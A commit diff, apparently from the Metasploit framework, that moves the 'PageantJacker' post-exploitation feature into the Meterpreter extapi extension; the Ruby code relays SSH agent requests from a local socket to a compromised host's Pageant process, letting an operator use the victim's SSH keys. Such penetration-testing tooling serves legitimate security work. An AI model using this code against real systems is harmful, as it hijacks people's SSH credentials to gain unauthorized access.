Merge pull request #1 from bcook-r7/land-5380-pageantjacker

update pageantjacker to run as part of extapi

Author: stufus

lib/rex/post/meterpreter/extensions/extapi/extapi.rb

@@ -6,6 +6,7 @@
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
 require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
 require 'rex/post/meterpreter/extensions/extapi/ntds/ntds'
+require 'rex/post/meterpreter/extensions/extapi/pageant/pageant'
 require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
 
 module Rex
@@ -36,6 +37,7 @@ def initialize(client)
               'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
               'adsi'      => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
               'ntds'      => Rex::Post::Meterpreter::Extensions::Extapi::Ntds::Ntds.new(client),
+              'pageant'   => Rex::Post::Meterpreter::Extensions::Extapi::Pageant::Pageant.new(client),
               'wmi'       => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
             })
         },

lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb

@@ -0,0 +1,44 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Post
+    module Meterpreter
+      module Extensions
+        module Extapi
+          module Pageant
+            ###
+            # PageantJacker extension - Hijack and interact with Pageant
+            #
+            # Stuart Morgan <[email protected]>
+            #
+            ###
+            class Pageant
+              def initialize(client)
+                @client = client
+              end
+
+              def forward(blob, size)
+                return nil unless size > 0 && blob.size > 0
+
+                packet_request = Packet.create_request('extapi_pageant_send_query')
+                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size)
+                packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob)
+
+                response = client.send_request(packet_request)
+                return nil unless response
+
+                {
+                  success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS),
+                  blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB),
+                  error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE)
+                }
+              end
+
+              attr_accessor :client
+            end
+          end
+        end
+      end
+    end
+  end
+end

lib/rex/post/meterpreter/extensions/extapi/tlv.rb

@@ -75,6 +75,12 @@ module Extapi
 TLV_TYPE_NTDS_TEST                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 80)
 TLV_TYPE_NTDS_PATH                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 81)
 
+TLV_TYPE_EXTENSION_PAGEANT_STATUS           = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 85)
+TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE     = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 86)
+TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB     = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 87)
+TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN          = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 88)
+TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN          = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 89)
+
 TLV_TYPE_EXT_WMI_DOMAIN                     = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 90)
 TLV_TYPE_EXT_WMI_QUERY                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 91)
 TLV_TYPE_EXT_WMI_FIELD                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 92)

lib/rex/post/meterpreter/extensions/pageantjacker/pageantjacker.rb

@@ -38,6 +38,19 @@ def initialize(info = {})
       ], self.class)
   end
 
+  def setup
+    unless session.extapi
+      vprint_status("Loading extapi extension...")
+      begin
+        session.core.use("extapi")
+      rescue Errno::ENOENT
+        print_error("This module is only available in a windows meterpreter session.")
+        return
+      end
+    end
+  end
+
+
   def run
     # Check to ensure that UNIX sockets are supported
     begin
@@ -47,18 +60,6 @@ def run
       return false
     end
 
-    # Attempt to load the pageantjacker extension if it isn't already loaded.
-    unless session.pageantjacker
-      print_status("Loading PageantJacker extension on session #{session.sid} (#{session.session_host})")
-      session.core.use("pageantjacker")
-    end
-
-    # Fail if it cannot be loaded
-    unless session.pageantjacker
-      print_error("Failed to load PageantJacker on session #{session.sid} (#{session.session_host})")
-      return false
-    end
-
     # Get the socket path from the user supplied options (or leave it blank to get the plugin to choose one)
     if datastore['SocketPath']
       @sockpath = datastore['SocketPath'].to_s
@@ -84,7 +85,7 @@ def run
           socket_request_data = s.recvfrom(8192) # 8192 = AGENT_MAX
           break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?
           vprint_status("PageantJacker: Received data from socket (size: #{socket_request_data.first.size})")
-          response = client.pageantjacker.forward_to_pageant(socket_request_data.first, socket_request_data.first.size)
+          response = session.extapi.pageant.forward(socket_request_data.first, socket_request_data.first.size)
           if response[:success]
             begin
               s.send response[:blob], 0